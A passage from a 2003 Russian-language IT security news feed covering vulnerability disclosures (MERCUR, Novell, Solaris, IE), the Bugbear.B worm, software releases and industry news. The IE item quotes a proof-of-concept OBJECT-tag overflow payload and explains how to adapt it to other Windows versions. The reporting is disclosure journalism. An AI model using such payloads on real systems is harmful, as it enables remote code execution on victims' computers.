Британский разработчик программного обеспечения Silicon Village запустил в эксплуатациюсервисное решение для отправки конфиденциальных SMS-сообщений. Новое кодирующее приложение обеспечивает безопасную передачу данных между абонентами, работающими с платформами Nokia 60 и Symbian. Приложение разработано Дэвидом Рейнолдсом (David Reynolds) и получило название Fortress SMS. Пользователи услуги Fortress SMS могут создавать и читать зашифрованные сообщения непосредственно на своих смартфонах без необходимости наличия каких-либо новых аппаратных решений у оператора. Сообщения сохраняются в зашифрованном виде, при этом используется пароль, защищающий их от несанкционированного просмотра. Fortress SMS отличает шифрование, совместимое с государственным стандартом кодирования AES по алгоритму Rijndael, хранение зашифрованных сообщений, поддержка продолжительных (каскадированных) сообщений, поддержка нескольких адресатов, проверка целостности зашифрованных сообщений и поддержка набора символов Unicode. Подробности - http://www.silicon.village.co.uk/
9/06/2003 14:04 Уязвимость в MERCUR Mailserver.
Dennis Rand из Дании сообщает об обнаружении уязвимости в почтовом сервере для ОС Windows NT4/2000/XP - Mercur Mailserver. Этот почтовый сервер поддерживает протоколы SMTP, POP3, IMAP. Было обнаружено, что при работе по протоколу IMAP4 при посылке более 8000 символов в качестве аргумента команд EXAMINE, DELETE, SUBSCRIBE, RENAME, UNSUBSCRIBE, LIST, LSUB, STATUS, LOGIN, CREATE, SELECT происходит переполнение буфера. В результате этого можно как вызвать отказ службы IMAP, так и выполнить произвольный код с полномочиями SYSTEM из-за перезаписи переключателя возврата в стеке. Уязвимости присвоен код HIGH ввиду того, что для проведения атаки не требуется авторизации в системе. Уязвима версия 4.2 (SP2) с версией файла до 4.2.14.0. Atriumsoftwareusa (фирма, занимающаяся поддеркой почтового сервера) сообщает о выходе версии файла 4.2.15.0, в которой уязвимость устранена. Сообщается также о наличии подобной уязвимости в MDaemon 6.7.8. Для проверки рекомендуется воспользоваться утилитой IMAPAuditor, доступной с URL - www.0x36.org. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0049.html
9/06/2003 12:18 Вышла новая версия Knoppix.
Как сообщается на linux.org.ru, Вышла новая версия Knoppix Обновлено: * V3.2-2003-06-06 - New version of loop-aes (1.7c) - Remaining KDE 3.1.2 packages updated - kudzu and hardware detection update - Patches to knoppix-autoconfig for Fabians upcoming new installer - Lots of package updates - grace plotting program removed because of space reasons (see QUANTIAN, http://dirk.eddelbuettel.com/quantian... for a scientific Knoppix edition) - bximage for bochs added, and bochs update - always start apmd in case of APM bios (some newer notebooks seem to need it, otherwise they go into suspend mode after 10 minutes) ISO-образ - ftp://ftp.ntua.gr/pub/linux/knoppix/KNOPPIX_V3.2-2003-06-06-EN.iso
9/06/2003 11:42 От пользователей будут прятать информацию о багах в ПО.
Разработчики софта не любят, когда их баги используются нечистыми на руку гражданами. Но еще больше их приводит в бешенство то, когда об ошибках в ПО им сообщают раздосадованные пользователи. Совместными усилиями разработчики программного обеспечения приняли решение о том, что информация об ошибках в софте не должна просачиваться в СМИ и становиться общедоступной благодаря Интернету. На прошлой неделе структура с громким названием Организация безопасности Интернета (Organization for Internet Safety, OIS), в которую входят одиннадцать крупнейших разработчиков софта (включая Microsoft) и систем безопасности, опубликовала черновик разработанного ею стандарта по сообщениям о найденных программных ошибках. Как пишет SecurityFocus, главное внимание в проекте уделяется процессу сообщения о найденных багах и выкладывании информации о них в Сети. В плане красной нитью идет идея о том, что информация не должна просачиваться на общеизвестные сайты. Тем самым компании намерены не только защитить свой авторитет, но и создать нормальные условия для устранения ошибок в рабочем порядке. Источник - http://www.runet.ru
9/06/2003 11:06 Недельный отчет о вирусах от Panda Software.
Опубликован традиционный недельный отчёт о вирусах компании Panda Software. В отчете о вирусной активности за прошедшую неделю рассмотрены пять червей: Bugbear.B, Sobig.C, Redisto.B, Festival и Naco.D. Самой яркой новинкой признаётся, естественно, версия "B" червя Bugbear благодаря тому, что за последние несколько суток этот червь вызвал самую серьезную за последние месяцы вирусную эпидемию. Заинтересованные подробным описанием червей могут посетить ссылку, приведённую ниже. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=163
9/06/2003 10:06 В США создано Национальное подразделение кибербезопасности.
В стуктуре Министерства национальной безопасности США (DHS) новое подразделение будет насчитывать 60 человек и займет место в составе Отдела анализа информации и защиты инфрастуктуры (IAIP), которое находится в прямом подчинении секретаря DHS Тома Риджа. В течение ближайшего месяца будет назначен глава подразделения, который, как сообщает Internet News, "в сущности, станет национальным киберцарем". Одновременно с созданием подразделения будет расформирован специальный совет по кибербезопасности, до настоящего времени напрямую подчинявшийся Белому дому. Согласно заявлению DHS, основные задачи подразделения кибербезопасности - это анализ и предсказание развития ситуации в киберпространстве, а также комплексная защита критической сетевой инфрастуктуры США. Создание подобного подразделения особенно акутально сегодня, когда количество киберпреступлений в мире стремительно растет. В частности, по данным Координационного центра по компьютерной безопасности (CERT), в первом квартале текущего года было зафиксировано 42 тысячи вторжений в защищенные сети, что более чем в два раза превышает количество подобных случаев за весь 2002 год. Источник - http://dc.internet.com/news/article.php/2218761
8/06/2003 20:45 «Русские мозги» разрабатывают для ЦРУ новую систему распознавания.
ЦРУ финансирует основанную русским иммигрантом фирму, разрабатывающую для Управления новейшую систему распознавания изображений, которая позволит разведчикам-аналитикам "просеивать" миллионы картинок и даже кадров видеозаписей. По сообщению Newsru, калифорнийская компания PiXlogic LLC, одним из основателей которой был Владимир Троянкин, иммигрировавший в США в 1998 году, приняла от ЦРУ заказ на разработку многообещающей системы распознавания образов нового поколения. Существующие системы данного типа (уже применявшиеся для т.н. "face control" на различных крупных спортивных событиях в США) продемонстрировали свою полную неэффективность, а перед ЦРУ после терактов 11 сентября встала задача принять "на вооружение" систему, которая могла бы эффективно и достаточно оперативно "узнавать" номера машин на снимках, различать различные объекты - например, отличать вертолет от птицы в небе, а в перспективе - и узнавать лица людей на снимках или на видео. Непосредственным заказчиком стала некоммерческая организация In-Q-Tel, названная так по имени "мистера Q", техника из фильмов о Джеймсе Бонде, тратящая 35 млн долларов в год на различного рода высокие технологии, приспосабливаемыми под нужды разведчиков и контрразведчиков, сообщает RussiaNY. Компьютерная система обработки изображения является одним из элементов т.н. технологии “data mining”, являющейся ключевым элементом скандально известного “Эшелона”. Источник - http://www.oxpaha.ru
8/06/2003 19:08 Инсталляция NetBSD на Palm.
На сервере onlamp появилась статья Майкла Лукаса об установке ОС NetBSD на "Палм" от Хьюлетт-Паккард HP Jornada 728. Как пишет сам автор, эта модель HP сейчас не производится и её можно достать либо подержанной, либо на аукционе. Обычно поставляется с предустановленной Windows CE. Не совсем понятен смысл такого издевательства над Палмом, но, возможно, кому-то будет интересно описание инсталляции NetBSD на Палмы. Кстати, позволю себе привести цитату самого автора в начале повествования: "You could even install onto standard PC hardware in this manner, if you wanted to be masochistic about it". ;) Cтатья - http://www.onlamp.com/pub/a/bsd/2003/06/05/Big_Scary_Daemons.html
8/06/2003 18:48 Несколько уязвимостей в Novell Netware.
Выпущены три бюллетеня от Novell, в которых описываются уязвимости в операционной системе Netware 6.x, выпускаемой этой фирмой. Бюллетени носят шифр - NOVL-2003-2966181, 2966205, 2966207. Первая из них связана с компонентом HTTPSTK.NLM и позволяет модифицировать пакеты. Вторая и третья связаны с компонентом iChain 2.2 - модулями NCPIP.NLM, JSTCP.NLM (в первом бюллетене) и NPKIT.NLM (третий бюллетень). Наличие уязвимости может привести к DoS и неработоспособности сервера под управлением Netware. Выпущены соответствующие патчи. NOVL-2003-2966181 - http://support.novell.com/servlet/tidfinder/2966181 NOVL-2003-2966205 - http://support.novell.com/servlet/tidfinder/2966205 NOVL-2003-2966207 - http://support.novell.com/servlet/tidfinder/2966207
8/06/2003 18:04 Norton Utilities для Mac OS X.
В ближайшее время Symantec выпустит пакеты Norton Utilities 8.0 и Norton SystemWorks 3.0 для Macintosh. Все компоненты набора утилит для устранения ошибок файловой системы, оптимизации диска и восстановления данных совместимы с Mac OS X. Norton Utilities 8.0 будут поставляться на компакт-диске с поддержкой двойной загрузки: на Mac OS X и Mac OS 9.x. Более тесная интеграция с Mac OS X обеспечила, как утверждают в компании, "значительное увеличение" скорости работы основных утилит (Disk Doctor, Speed Disk и UnErase). Добавлен планировщик дефрагментации, позволяющей свести к минимуму время отрыва пользователя от работы. Подробности - http://www.osp.ru/news/soft/2003/06/05_04.htm
8/06/2003 17:23 FreeBSD 5.1 уже на подходе.
Scott Long из FreeBSD Release Engineering Team сообщает, что версии FreeBSD 5.1-Release для архитектур i386 и pc98 уже готовы к появлению в интернете. Варианты системы для alpha и sparc64 должны будут появиться в течение двух дней. Официальный анонс запланирован на 9 июня (понедельник), но уже в самое ближайшее время FreeBSD 5.1 может быть найден на некоторых ftp-зеркалах. Источник новости - сайт nixp.ru. Подробности - http://freebsdforums.org
8/06/2003 16:32 Устройство телефонов стандарта GSM.
На сайте www.mobile-review.com представлена статья Сергея Сенина, детально описывающая принцип работы и устройство современных GSM-телефонов. Статья может представлять интерес для тех, кто хочет самостоятельно разобраться в принципах работы современной сотовой аппаратуры. Хотя, необходимо признать, довольно поверхностно описываются начальные сведения. Статья - http://www.mobile-review.com/articles/2003/gsm-phones.shtml
7/06/2003 20:35 В Украине предотвращено крупное компьютерное ограбление.
В Киеве задержан студент пятого курса одного из столичных вузов, занимающийся изготовлением и сбытом за рубеж поддельных кредитных карточек систем “Visa”, “American Express”, “Mastercard”, “Dinez club”. При задержании у него было изъято 158 готовых карточек и 2576 заготовок пластиковых карточек с магнитной полосой, но без реквизитов системы, банка и владельца. Производство было налажено в специально снятой квартире, оборудованной компьютером, устройством для нанесения на заготовку реквизитов банка и владельца карточки, ламинатором и даже небольшим устройством для изготовления защитных голограмм. Банковские эксперты дали высокую оценку качеству изъятых фальшивок. В настоящее время сотрудники многих зарубежных банков проверяют изъятые карточки. Пока проверено три десятка кредитных карточек “Visa” – возможный ущерб только по ним мог составить более 300 тысяч долларов. В случае реализации этих преступных намерений, зарубежные банки могли потерять многие миллионы долларов. Источник - http://www.crime-research.org
7/06/2003 20:06 Эксплоит уязвимости в IE.
Господин под ником Alumni (судя по почтовому адресу - из Казахстана), ранее опубликовавший эксплоит Web-DAV, опубликовал исходный код эксплоита, использующего уязвимость, недавно обнаруженную в IE и позволяющую с использованием свойства тега OBJECT запустить произвольный код на компьютере жертвы. Написан на Перле. Для его использвоания достаточно запустить скрипт на HTTP-сервере и каким-либо образом заманиь жертву с IE на этот сервер. Эксплоит - http://archives.neohapsis.com/archives/bugtraq/2003-06/0064.html
7/06/2003 19:33 Книга "Протоколы Интернет".
На сайте book.itep.ru можно прочитать замечательную книгу Зам. зав. кафедрой "Телекоммуникационные сети и системы" МФТИ Юрия Алексеевича Семёнова "Протоколы Интернет". В ней очень доходчиво и подробно рассмотрены все протоколы, на которых построен Интернет. Рекомендуется для самостоятельного изучения сетевых технологий. Книга - http://book.itep.ru/1/intro1.htm
7/06/2003 19:06 "Кавказ - Центр" вновь нашёл убежище в Литве
Судьба сепаратистского сайта Кавказ - центр, который не раз подвергался гонениям со стороны властей вновь в руках литовских провайдеров. Напомним, что в апреле 2003 года сайт "Кавказ-центр", который явно пропагандирует взгляды чеченских террористов был закрыт литовским провайдером "Микролинк Дата", в основном из-за давления росийской стороны на Департамент безопасности Литвы. После того, как в дело вмешались представители МИД России "Кавказ-центр" отстался без хостинг-провайдера и был вынужден искать более демократичные страны для своей дальнейшей "прописки". Подходящая страна оказалась рядом и уже спустя некоторое время сепаратистский сайт удобно расположился на сервере эстонского провайдера "Старман". Однако и тут "Кавказ-центр" привлек к себе внимание как российских, так и эстонских властей и в конце апреля доступ к сайту сепартистов был закрыт. Официальная версия - расторжение договора с провадером "Старман" об аренде сервера, причем инициатором расторжения называли владельцев "Кавказ-центра". Как сообщает ИТАР-ТАСС, сайт "Кавказ-центр" вновь пользуется услугами литовских провайдеров и уже две недели функционирует на сервере вильнюсской компании "Элнет". Как заявил ИТАР-ТАСС директор литовского предприятия Римантас Пашис, "чеченцы приобрели служебную станцию за свои деньги, а "Элнет" лишь предоставляет услуги доступа к сетям Интернета и место в своем помещении". Источник - http://www.itar-tass.com
7/06/2003 18:23 Права американских борцов с пиратами могут ограничить.
Американский сенатор Сэм Браунбэк (штат Канзас) представил в среду новый законопроект. Идея законопроекта заключается в стремлении поставить на место разбушевавшихся поборников защиты авторских прав. Законопроект будет официально представлен сенатором на следующей неделе. Закон регулирует применение систем управления цифровыми правами (DRM). Он обязывает владельцев авторских прав своевременно сообщать пользователям о наличии системы защиты от копирования на том или ином носителе. Кроме того, владельцам авторских прав придётся получать разрешение судьи, для того чтобы узнать имена или адреса подозреваемых в пиратстве (эта часть законопроекта прямо противоречит одиозному Закону о защите авторских прав в цифровую эпоху). Ассоциация американских звукозаписывающих компаний (RIAA) уже успела осудить данный законопроект. Как заявил представитель Ассоциации, проект Браунбэка "отягощен суждениями, которые враждебны всем владельцам интеллектуальной собственности". По его мнению, Закон о защите авторских прав в цифровую эпоху сбалансирован куда лучше. Источник - http://www.compulenta.ru
7/06/2003 18:01 Новая версия СУБД IBM DB2.
Корпорация IBM начала поставки нового варианта своей системы управления базами данных DB2. Пакет DB2 UDB Express предназначен для предприятий малого и среднего бизнеса. Эта система построена на базе "большой" DB2 и предназначена для использования в системах электронного бизнеса. По своим функциональным возможностям DB2 UDB Express уступает базовой версии DB2, однако это с лихвой компенсируется простотой ее внедрения и настройки. В DB2 UDB Express нашла воплощение технология SMART (self-managing and resource tuning), которая призвана обеспечить автономное управление ресурсами и их распределение. Благодаря этой технологии СУБД не требует чересчур сложной настройки и неусыпного надзора со стороны администратора. Многие задачи по диагностике и устранению неполадок, управлению базой данных и т.п. могут решаться в автоматическом режиме. Система также извещает администратора обо всех возможных проблемах. DB2 UDB Express поддерживает многие стандартные интерфейсы приложений: JDBC, SQLJ, ODBC, OLE DB, ADO, ADO.NET, DB2 CLI, Embedded SQL, XML, веб-сервисы и компонентные архитектуры на базе технологий Java 2 Platform, Enterprise Edition (J2EE), JavaBeans, Microsoft Component Object Model (COM) и XML. Кроме того, СУБД может интегрироваться с популярными средами разработки ebSphere Studio Application Developer, Microsoft Visual Studio .NET 2002, Microsoft Visual Basic, Microsoft Visual C++, Microsoft Visual InterDev. DB2 UDB Express выпускается в версиях для Linux и Windows. Цена на СУБД начинается с отметки 499 долл. США. Источник - http://www.compulenta.ru
7/06/2003 17:57 Эпидемия Bugbear.b.
К настоящему моменту, по оценкам Panda Software, более 400000 компьютеров, объединенных в локальные сети, могут быть заражены червем Bugbear.b. Наибольшее число заражений приходится на Европу и США. Количество обращений в cлужбу технической поддержки компании Panda Software увеличилось в пять раз. За последние двадцать четыре часа Bugbear.b заразил уже 13,65% от общего количества компьютеров, проверенных программой Panda ActiveScan. В сумме получается более 23% компьютеров, зараженных одним червем или его разновидностью. Менее чем за 24 часа Bugbear.b заразил большее количество компьютеров, нежели Klez.I за весь май 2003 года. Источник - http://www.viruslab.ru
6/06/2003 18:38 Новый протокол ускорит интернет в тысячи раз.
Ученые из Калифорнийского технологического института в Пасадене придумали, как ускорить передачу данных по каналам интернета. Для этого они предлагают перейти на новую модификацию протокола TCP, названную Fast TCP ("быстрый TCP"). Первая версия протокола TCP была разработана еще в 70-х годах XX века и в современных условиях уже не слишком эффективна. Обычная версия TCP предусматривает при передаче дробление данных на пакеты размером в 1500 байт, которые включают адреса машин отправителя и получателя. После завершения передачи пакета машина-отправитель ждет ответа от получателя, и если ответа нет, посылает данные повторно, на вдвое меньшей скорости. Пропускную способность нынешних сетей не сравнить с той, что была тридцать лет назад. Однако TCP остаётся всё тем же, и возможности широкополосных каналов никак не используются. Fast TCP тоже дробит данные на пакеты по 1500 байт в каждом. Получатель, как и в случае с обычным TCP, возвращает отчет о доставке пакета. Однако Fast TCP фиксирует время прохождения пакетов с данными и ответа получателя. Это позволяет оперативно обнаруживать возникающие задержки. На основании полученных данных оценивается максимально возможная скорость передачи данных, которую можно достичь без потери информации. В дальнейшем используется именно она. Поскольку размер пакета в Fast TCP и TCP одинаков, новый протокол можно реализовывать на уже существующих аппаратных платформах, как на принимающей, так и на передающей стороне. Подробнее - http://www.compulenta.ru/2003/6/5/39895/?ref=sidebar
6/06/2003 17:32 Коды ошибок в Windows.
Вряд ли эта новость будут представлять интерес для опытных программистов, однако зачастую приходится слышать вопросы о том, что обозначает тот или иной код ошибки приложения в ОС Windows. Cобственно, все коды ошибок приведены в MSDN. Ссылка, приведённая ниже, указывает на документ, в котором описаны все эти ошибки. Ccылка - http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/system_error_codes.asp
6/06/2003 12:24 Уязвимость в реализации IPv6 в Microsoft Windows 2000/XP/2003.
В BUGTRAQ появилось сообщение о наличии уязвимости сетевого стека операционных систем Win 2K/XP/2003 в случае включения поддержки IPv6 (новая версия сетевого протокола IP, который всё никак не может прийти на смену ныне действующего IPv4). В этом случае удалённый атакующий может при помощи ICMP-флуд атаки выполнить DoS и, таким способом, остановить работу сетевых служб. Как сообщается, M$ об уязвимости было соообщено по телефону. Напомним, что ранее также сообщалось о неработоспособности встроенного файрволла ICF при работе с протоколом IPv6. Подробности - http://www.securityfocus.com/bid/7788/info/
6/06/2003 12:09 В Москве задержан хакер, шантажировавший латвийскую компанию.
В Москве задержан хакер, шантажировавший руководство латвийской интернет-компании. Как сообщили в ГУВД Москвы, накануне в ходе проведения спецоперации у дома №2 по ул. Рогова (Западный административный округ) был задержан неработающий москвич. В ходе следственных действий было установлено, что он, используя копию базы данных клиентов Интернета, за сохранность и безопасность которой отвечает латвийская компания "Евросистемы", направлял в адрес руководства электронные письма с требованием выплатить ему $30 тысяч. В противном случае хакер обещал распространить базу данных кредитных карт клиентов компании в Cети. В настоящее время задержанный находится под подпиской о невыезде, проводятся следственные мероприятия. Преступник был пойман накануне в своей квартире на улице Рогова. Как установило следствие, 25-летний безработный Антон Глущенко приобрел компакт-диск с базой данных клиентов одного из коммерческих прибалтийских интернет-сайтов и угрожал распространить в Интернете сведения об их кредитных картах. Компьютерный преступник по электронной почте послал несколько сообщений с требованием о немедленной выплате денег и указанием анонимного счета, на который необходимо было их перевести. Подробнее - http://www.securitylab.ru/?ID=38201
6/06/2003 11:35 Уязвимость в ОС Solaris.
David Thiel сообщает об уязвимости в ОС Solaris, выпускаемой и поддерживаемой фирмой Sun Microsystems. Уязвимость обнаружена в службе потоколирования операционной системы syslogd. Путём посылки UDP-пакетов длиной более 1024 байт, удалённый атакующий может вызвать переполнение в syslogd с выкидыванием core-файла. Необходимо отметить, что подобное поведение демона является нестандартным, поскольку, согласно RFC3164 (секция 6.1), подобные пакеты должны усекаться до разрешённого размера. Автор пишет, что он не смог создать эксплоит, который позволял бы выполнить произвольный код на сервере, однако само наличие уязвимости может позволить злоумышленнику перед проникновением в систему свалить syslogd с целью скрытия следов проникновения. Обнаружена в версиях Solaris - 2.6, 2.7, 8, 9 для платформ x86 и SPARC. Sun выпущены патчи - 110945-08 (SPARC), 110946 (x86), устраняющие уязвимость. Подробности - http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=110945&rev=08
6/06/2003 11:11 Настольная Linux от Ximian перекликается с Windows.
В понедельник компания Ximian, производитель Linux-ПО, анонсировала новую версию своего главного программного продукта для настольных ПК. Ximian Desktop 2 включает оптимизированную версию комплекса приложений OpenOffice и новые средства, облегчающие работу ПК на платформе Ximian в одной сети с ПК на платформе Windows. Ximian — одна из нескольких компаний, которые стараются ускорить распространение настольных Linux-ПК, предлагая версии операционной системы, имитирующие форму и содержание Windows. Однако Ximian пошла дальше, опередив других на несколько шагов и предложив собственную программу e-mail и PIM (personal information manager), заменяющую Microsoft Outlook. Программное обеспечение Ximian Evolution получило поддержку от Sun Microsystems и других компьютерных компаний. Ximian Desktop 2 включает усовершенствованные средства записи CD, новые инструменты, облегчающие установку принтеров, а также систему навигации, имитирующую папку My Computer из Windows. Подробнее - http://zdnet.ru/?ID=301747
6/06/2003 10:27 PQRemove: бесплатная утилита от Bugbear.B.
Поскольку сохраняется высокий риск заражения недавно появившимся червем Bugbear.B, компания Panda Software выпустила бесплатную утилиту PQRemove. Специальная утилита предназначена для очистки и восстановления компьютеров, зараженных этим червем. Новый червь стал причиной нескольких тысяч вирусных инцидентов по всему миру. За последние часы Bugbear.B занял первую позицию в списке наиболее распространенных вирусов. О масштабах распространения вируса говорит и то, что число обращений Службу технической поддержки компании Panda Software увеличилось в пять раз. Cкачать - http://updates.pandasoftware.com/pq/gen/bugbearb/pqremove.com.
6/06/2003 10:15 Обнаружена новая версия сетевого червя "Tanatos.b" (aka Bugbear.b).
Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакеров и спама, сообщает об обнаружении новой разновидности сетевого червя "Tanatos": Tanatos.b (aka Bugbear.b). Данная версия вредоносной программы обладает рядом опасных функций. В частности, она способна заражать исполняемые файлы многих программ, хранящихся на жестком диске, а также спровоцировать утечку конфиденциальной информации с зараженного компьютера. В настоящий момент уже зарегистрированы многочисленные случаи заражения. Интернет-червь Tanatos.b распространяется по электронной почте как файл-вложение в зараженном письме. При этом письмо может иметь различные тему, тело письма и название вложения. Активизация вредоносной программы происходит при запуске файла-носителя, после чего червь заражает компьютер и запускает процедуру распространения. Для запуска файла-вирусоносителя используются несколько способов: автоматически, через IFRAME брешь в системе безопасности Internet Explorer, при помощи пользователя, через локальные сети. При установке Tanatos.b копирует себя под случайным именем в каталог автозапуска программ, создает свои файлы в системной директории Windows, а также копирует себя в каталог Windows и директорию временных файлов. Затем червь начинает процедуры распространения, используя встроенный SMTP-движок. Для рассылки по электронной почте Tanatos.b ищет новые адреса, сканируя на доступных дисках файлы со следующими расширениями: *.ODS, INBOX.*, *.MMF, *.NCH, *.MBX, *.EML, *.TBB, *.DBX. Подробнее - http://www.kaspersky.ru/news.html?id=1239481
6/06/2003 09:07 Россия может опередить Китай по уровню музыкального пиратств.
Россия быстро поднимается в хит-параде лидеров музыкального пиратства и грозит в скором времени опередить Китай. По мнению представителей звукозаписывающего бизнеса, это может повредить как иностранным инвестициям в РФ, так и надеждам Москвы на вступление в ВТО. Вопрос защиты интеллектуальных прав, который становится все более важным компонентом внешнеторговой политики США, является главным барьером на пути присоединения к Всемирной торговой организации России и Украины, где нелегальные CD и DVD распространены куда сильнее, чем легальная продукция. В одной только России рынок пиратской продукции вырос в прошлом году до $311 млн. в то время, как "законный" рынок составил $257 млн. "Россия становится крупнейшим экспортером пиратской продукции", - сказал сегодня на пресс-конференции в Москве Игорь Пожитков, глава регионального отдела Федерации производителей фонограмм (IFPI). Россия на данный момент занимает второе место в мире по объемам производства пиратской музыки, уступая лишь Китаю. Пиратские компакт-диски из России были изъяты в прошлом году в 24 странах мира. Источник - http://www.cnews.ru
5/06/2003 16:19 Построение файрволлов с использованием iptables.
На сайте earthweb.com в разделе "Безопасность" опубликована неплохая статья Карлы Шрёдер под названием "Building Firewalls with iptables, Part 1". Как следует из самого названия, она посвящена описанию процесса построения файрволла на основе iptables. Cетевой фильтр Netfilter/iptables начал использоваться в Linux в ядрах ветви 2.4 (хотя можно его собрать и в 2.2). Пришёл на смену использующегося ранее ipchains (хотя в ядрах 2.4 предусмотрена возможность использования и его). Выполняет функции файрволла, сетевой трансляции адресов (NAT) и преобразования проходящих пакетов (mangle). Iptables анализирует только заголовки пакетов, содержимое пакетов не анализируется. В статье описывается сам процесс построения надёжного файрволла на основе iptables для защиты внутренней подсети. Для большей защиты рекомендуется использовать прокси-сервер SQUID (либо неплохой прокси для Win-систем - AnalogX). Статья разделена на 2 части. В первой описывается основные концепции построения файрволла и работы iptables. Во второй (которая пока не вышла) планируется привести конкретные примеры создания цепочек правил для различных вариантов применения сервера. Статья наверняка будет представлять интерес для системных администраторов. Статья - http://networking.earthweb.com/netsecur/article.php/2213171
5/06/2003 14:10 Две новых рассылки на Securityfocus.
Как сообщает Hal Flynn из Symantec Corp. (которая сейчас владеет сайтом Securityfocus и списком рассылки BUGTRAQ) - в рамках проекта SecurityFocus появилось два новых почтовых списка рассылки: Pen-Test и Firewalls. Первый посвящён обзору инструментов тестирования проникновения (penetration testing) и сетевой активности. Второй - широкому спектру применения файрволлов для защиты сетей. В рамках каждой из этих рассылок также организуются соответствующие форумы. Желающие могут подписаться на эти списки. Оба ведутся (естественно) на английском языке. Подписаться - http://www.securityfocus.com/archive
5/06/2003 13:45 Подробности уязвимости в Internet Explorer.
Как уже мы писали ранее, Microsoft был выпущен бюллетень MS03-20, в котором ссылаются на патч, закрывающий уязвимость в броузере, выпускаемом этой корпорацией. Derek Soeder из eEye Digital Security опубликовал в BUGTRAQ подробное описание уязвимости. Как следует из него, уязвимость связвана с некорректной обработкой свойства "Type" тега "Object". Этот тег обычно используется для вставки объектов (например, компонентов ActiveX) в HTML-страницу. Свойство "Type" этого тега, в свою очередь, предназначено для описания MIME-типа вставляемого объекта ("plain/text", "application/hta", "audio/x-mpeg" etc.). Была обнаружена возможность переполнения буфера в этом свойстве. Хотя броузер и выполняет проверку границ буфера при разборе тега "Object", эту проверку можно обойти при помощи специальных символов. Реализация атаки на уязвимость достаточно проста и основана на переполнении стека буфера и позволяет удалённому злоумышленнику выполнить произвольный код в атакуемой системе. Так как уязвимость основана на HTML, атака может быть осуществлена через ньюс-группы, почту и Вэб-сайты. В письме приводится пример атаки на Windows 2000 с .Net Framework и повледней версией IE. Код выглядит следующим образом - <object type="[/x64]AAAAAAAAAAAAAAAA">Cooler Than Centra Spike</object>. Варьируя количество символов "/" можно осуществить подобную атаку на другие типы M$-ОС. Автор замечает интересную особенность - после проверки границ буфера каждый символ "/" преобразуется (волшебным образом? ;)) в три символа "_/_". В результате подобного "расширения" возникает возможность перезапуска буфера (или срыва буфера - buffer overrun. Cледствием этого является получение полного контроля над ключевыми регистрами и возможность запуска любого кода, который будет загружен в регистр EDX (перед этим осуществляет JMP EDX). Уязвимость была обнаружена инструментом собственной разработки под названием "eVe", который был использован для нахождения приложений, который не используют проверки буфера, а также для проверки обработки буфера в памяти. Уязвимость была обнаружена в версиях IE - 5.01, 5.5, 6.0 (в том числе для Windows Server 2003). Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0030.html
5/06/2003 12:16 Cтатья о безопасности беспроводных сетей.
На сайте Дмитрия Леонова www.bugtraq.ru опубликована довольно интересная статья Максима Филиппова "Вопросы обеспечения безопасности корпоративных беспроводных сетей стандарта 802.11. Специфика России". Технологии беспроводных сетей широко используется во всем мире, привлекая внимание пользователей относительно невысокими экономическими затратами и простотой развертывания, удобством использования и гибкой архитектурой. Бесспорным лидером на рынке беспроводных сетей является оборудование, отвечающее спецификациям семейства стандартов 802.11. Поэтому в дальнейшем при употреблении термина "беспроводные сети" будем иметь в виду сети, построенные на оборудовании, совместимом со стандартами семейства 802.11. Цель статьи - сделать обзор текущего состояния безопасности беспроводных сетей с целью ответа на вопрос: возможно ли уже сегодня построить корпоративную беспроводную сеть, устраивающую собственника сети с точки зрения обеспечения требуемого уровня безопасности, а также в соответствии с требованиями законодательства РФ и руководящих документов в области защиты информации? Статья - http://www.bugtraq.ru/library/security/wireless.html
5/06/2003 12:08 Первый патч для Windows Server 2003.
Microsoft выпустила очередной кумулятивный патч для Internet Explorer версий 5.01, 5.5 и 6.0. "Заплатке", исправляющей две ошибки, позволявших хакеру запускать на пользовательском компьютере любую программу на свое усмотрение, присвоена критическая степень важности. Особенность нового патча в том, что он является первым обновлением, затронувшим IE 6.0, встроенный в недавно вышедшую на рынок Windows Server 2003. То есть, по сути, это - первая заплатка для новой серверной операционной системы Microsoft. Соответствующий бюллетень по безопасности, описывающий уязвимости и патчи носит название MS03-20. Первая из уязвимостей связана с неправильной обработкой браузером тега object. Иногда, обрабатывая этот тег, в IE может произойти переполнение буфера- при этом броузер "упадет", а злоумышленник получит возможность выполнить произвольный код в пространстве памяти процесса. Чтобы использовать уязвимость, злоумышленник должен заманить жертву на специальным образом сконструированную веб-страницу или прислать ее по электронной почте. Вторая уязвимость вызвана ошибками при работе с несколькими диалогами загрузки файла. Если злоумышленник заставит браузер открыть слишком много таких диалогов и вызвать перегрузку браузера, то он получит возможность открыть на компьютере любой файл или запустить произвольный код. Подробнее - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-020.asp
5/06/2003 11:31 Немецкий суд закрыл сайт SCO.
Компания SCO Group вынуждена была закрыть свой германский сайт. Немецкая организация LinuxTag добилась вынесения судом временного решения, которое запрещает публикацию необоснованных угроз в адрес пользователей Linux. Представители LinuxTag обратились в суд, когда SCO разослала работающим с Linux компаниям письма с угрозами. В них утверждалось, что за незаконное использование Linux их могут привлечь к ответственности. LinuxTag обвинила SCO в нечестной конкуренции. SCO немедленно среагировала - обращение к пользователям Linux было оперативно удалено с немецкого сайта компании. После судебного решения SCO и вовсе закрыла немецкий сайт. Вероятно, в компании решили перестраховаться и убрать из интернета всю информацию, которую можно использовать против неё. Источник - http://www.compulenta.ru
5/06/2003 10:43 В Windows найдены секретные API.
Компания Whirling Dervishes выпустила на рынок новый инструмент, облегчающий разработку программного обеспечения Windows. Пакет NSELib представляет собой библиотеку, открывающую легкий доступ к использованию расширений NameSpace (NameSpace Extention). Ранее они редко использовались программистами из-за трудности написания соответствующего кода и малого количества информации о соответствующих программных интерфейсах. Если верить сообщению Vnunet, то Microsoft скрывала факт существования в оболочке Windows Explorer API, облегчающих работу с расширениями NameSpace. В результате, успешно пользоваться данным инструментом могли лишь программисты самой Microsoft. Эти программные интерфейсы использовались, в частности, в ОС Windows XP при реализации боковых панелей (task pad) в папках, в FTP-клиенте и встроенных средствах для работы с zip-архивами, которые предстают перед пользователями в виде сжатых папок. Специалисты Whirling Dervishes сумели обнаружить секретные API и обеспечить доступ к ним всех программистов, купивших пакет NSELib. Для использования NameSpace Extention не нужно создавать дополнительный код: все действия производятся с помощью графического интерфейса и широкого 